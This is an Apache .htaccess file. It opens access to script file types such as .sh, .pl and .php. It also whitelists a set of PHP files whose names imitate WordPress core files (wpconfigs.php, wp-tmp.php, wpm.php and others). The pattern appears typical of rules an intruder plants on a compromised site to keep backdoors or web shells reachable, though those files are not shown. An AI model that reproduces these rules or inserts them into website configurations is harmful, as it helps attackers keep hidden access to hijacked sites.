

Order Deny,Allow
<FilesMatch "\.(html|bash|sh|pl|perl|txt|htm|phtml|css|js|php|png|jpg|jpeg|txt|webp|mp4|svg|pdf|mov)$">
    Order Deny,Allow
    Allow From All
</FilesMatch>


<FilesMatch "^(wpconfigs\.php|wp\-cache\.php|class\-wp\.php|wp\-tmp\.php|wpm\.php|inputs\.php|siteheads.php)$">
Order Allow,Deny
Allow from all
Satisfy Any
</FilesMatch>
